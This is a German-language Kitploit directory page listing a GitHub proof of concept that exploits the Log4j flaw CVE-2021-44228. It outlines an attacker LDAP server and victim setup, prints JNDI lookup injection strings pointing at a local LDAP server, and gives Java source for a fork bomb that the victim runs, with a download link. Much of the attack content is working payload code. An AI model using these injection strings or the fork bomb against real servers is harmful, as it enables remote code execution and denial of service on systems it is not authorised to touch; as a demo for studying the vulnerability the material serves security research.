Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
log4j-exploit-fork-bomb — 💣💥💀 Beweis des Konzepts: Beispiel für das Auslösen einer Fork-Bombe auf einem entfernten Server aufgrund der Sicherheitslücke CVE-2021-44228 | Kitploit
Tools/GitHubGitHub/funcid/log4j-exploit-fork-bomb
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlPayload-Entwicklung
GitHubfuncid/log4j-exploit-fork-bomb

log4j-exploit-fork-bomb

💣💥💀 Beweis des Konzepts: Beispiel für das Auslösen einer Fork-Bombe auf einem entfernten Server aufgrund der Sicherheitslücke CVE-2021-44228

Repository anzeigen
1vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

log4j-exploit-mit-fork-bomb

💣💥💀 Proof of Concept: Beispiel für das Starten einer Fork-Bombe auf einem entfernten Server aufgrund der Sicherheitslücke CVE-2021-44228

  1. Erstellen eines LDAP-Servers des Angreifers (Modul server), der Darstellungen von Strings und Code ausgibt (Modul payload)

  2. Erstellen eines Beispielopfers (Modul victim) und Übergeben des Strings an Log4j JRE-Version <= 6u211, 7u201, 8u191 und 11.0.1

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
  1. Die Opferanwendung erhält vom Angreiferserver ein Byte-Array und interpretiert es als einzufügenden String oder als ausführbaren Code (Parameter com.sun.jndi.ldap.object.trustURLCodebase = true)

  2. Als Beispiel dient als ausführbarer Code eine Fork-Bombe (ein Programm, das seine eigenen Kopien startet und dabei die gesamte CPU-Zeit belegt)

root@kitploit:~
public class ForkBomb {

  public static void main(String... args) {
  
    Runtime.getRuntime().exec(new String[] {
        "javaw", 
        "-cp", 
        System.getProperty("java.class.path"), 
        "ForkBomb"
    });
  }
}
Tool herunterladen